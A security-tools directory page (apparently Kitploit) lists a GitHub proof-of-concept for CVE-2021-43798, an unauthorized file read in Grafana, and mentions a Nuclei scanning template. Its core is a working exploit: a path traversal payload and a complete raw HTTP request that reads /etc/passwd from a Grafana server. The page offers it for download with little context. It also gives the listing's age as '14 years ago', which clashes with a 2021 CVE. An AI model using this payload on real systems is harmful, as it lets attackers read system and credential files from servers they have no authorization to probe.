Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2021-43798-Grafana-File-Read — Proof-of-concept exploit for Grafana unauthorized file read (CVE-2021-43798), demonstrating path traversal to read arbitrary files, with a Nuclei template for automated scanning. | Kitploit
Tools/GitHubGitHub/bjliyanliang/cve-2021-43798-grafana-file-read
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubbjliyanliang/cve-2021-43798-grafana-file-read

CVE-2021-43798-Grafana-File-Read

Proof-of-concept exploit for Grafana unauthorized file read (CVE-2021-43798), demonstrating path traversal to read arbitrary files, with a Nuclei template for automated scanning.

View Repository
14 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Grafana-File-Read

Grafana Unauthorized File Read

Affected versions: 8.0.0-latest

wecom-temp-e380dc0174f4d9f46e9e217a6e2c3ddb

poc: /public/plugins/icon/../../../../../../../../../../../../../../../../../../etc/passwd

root@kitploit:~
GET /public/plugins/icon/../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: 127.0.0.1:3000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

image

nuclei poc: grafana.yaml

image

Download Tool